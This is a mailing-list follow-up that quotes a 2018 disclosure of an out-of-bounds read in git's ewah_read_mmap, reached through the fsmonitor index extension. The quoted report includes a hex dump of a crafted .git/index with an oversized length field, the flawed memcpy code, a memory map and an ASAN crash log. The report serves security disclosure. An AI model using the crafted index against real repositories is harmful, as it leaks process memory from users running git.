Greetings, all: Just curious if there was any additional comment on this potential OOB? I may have missed it and if so, apologies for the ask. Cheers, Ed -----Original Message----- From: git-owner@xxxxxxxxxxxxxxx [mailto:git-owner@xxxxxxxxxxxxxxx] On Behalf Of Luat Nguyen Sent: Thursday, June 14, 2018 7:00 PM To: git@xxxxxxxxxxxxxxx Subject: security: potential out-of-bound read at ewah_io.c |ewah_read_mmap| Hi folks, Recently, I’ve found a security issue related to out-of-bound read at function named `ewah_read_mmap` Assume that, an attacker can put malicious `./git/index` into a repo by somehow. Since there is lack of check whether the remaining size of `ptr`is equal to `buffer_size` or not. So the code reads exceed the buffer of `ptr` and reach to higher page. In this case, it is `/lib/x86_64-linux-gnu/ld-2.23.so`. Leads to infoleak. You can find more details and asan crash below. # xxd .git/index 00000000: 4449 5243 0000 0002 0000 0000 4653 4d4e DIRC........FSMN 00000010: 0000 0024 0000 0001 1538 2489 c8fc 3616 ...$.....8$...6. 00000020: 0000 0014 0000 0000 0000 2000 4141 .......... .AA ^ evil size here = 0x2000 ***** SNIP CODE ***** int ewah_read_mmap(struct ewah_bitmap *self, const void *map, size_t len) { … self->buffer_size = self->alloc_size = get_be32(ptr); ptr += sizeof(uint32_t); … memcpy(self->buffer, ptr, self->buffer_size * sizeof(eword_t)); [memory map] 0x7f990eca3000 0x7f990eca4000 r--p 1000 0 /media/sf_Fuzz/vuln_repo/.git/index <— where `ptr` is placed 0x7f990eca4000 0x7f990eca5000 r--p 1000 25000 /lib/x86_64-linux-gnu/ld-2.23.so <— memcpy will reach here 0x7f990eca5000 0x7f990eca6000 rw-p 1000 26000 /lib/x86_64-linux-gnu/ld-2.23.so <— and here [ ASAN log ] root@guest:/media/sf_SHARE/vuln_repo# /media/sf_SHARE/git-master-asan/git status ================================================================= ==4324==ERROR: AddressSanitizer: unknown-crash on address 0x7f6f235b0000 at pc 0x0000004bba79 bp 0x7ffc75e68850 sp 0x7ffc75e68000 READ of size 65536 at 0x7f6f235b0000 thread T0 #0 0x4bba78 in __asan_memcpy /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 #1 0x8c910e in ewah_read_mmap /media/sf_SHARE/git-master-asan/ewah/ewah_io.c:144:2 #2 0x8e2534 in read_fsmonitor_extension /media/sf_SHARE/git-master-asan/fsmonitor.c:46:8 #3 0xa05862 in read_index_extension /media/sf_SHARE/git-master-asan/read-cache.c:1615:3 #4 0xa046f3 in do_read_index /media/sf_SHARE/git-master-asan/read-cache.c:1872:7 #5 0xa03325 in read_index_from /media/sf_SHARE/git-master-asan/read-cache.c:1913:8 #6 0xa03231 in read_index /media/sf_SHARE/git-master-asan/read-cache.c:1634:9 #7 0x9de5e8 in read_index_preload /media/sf_SHARE/git-master-asan/preload-index.c:119:15 #8 0x566cc6 in cmd_status /media/sf_SHARE/git-master-asan/builtin/commit.c:1358:2 #9 0x4ede8c in run_builtin /media/sf_SHARE/git-master-asan/git.c:417:11 #10 0x4ea939 in handle_builtin /media/sf_SHARE/git-master-asan/git.c:632:8 #11 0x4ed655 in run_argv /media/sf_SHARE/git-master-asan/git.c:684:4 #12 0x4ea037 in cmd_main /media/sf_SHARE/git-master-asan/git.c:761:19 #13 0x759c8b in main /media/sf_SHARE/git-master-asan/common-main.c:45:9 #14 0x7f6f2243382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #15 0x41c268 in _start (/media/sf_SHARE/git-master-asan/git+0x41c268) Address 0x7f6f235b0000 is a wild pointer. SUMMARY: AddressSanitizer: unknown-crash /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0fee646adfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee646adfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee646adfd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee646adfe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fee646adff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fee646ae000:[fe]fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee646ae010: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee646ae020: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee646ae030: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee646ae040: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe 0x0fee646ae050: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4324==ABORTING root@guest:/media/sf_SHARE/vuln_repo# Regards, Luat Nguyen. ______________________________________________________________________ The information contained in this e-mail message and any attachments may be privileged and confidential. If the reader of this message is not the intended recipient or an agent responsible for delivering it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify the sender immediately by replying to this e-mail and delete the message and any attachments from your computer. ______________________________________________________________________
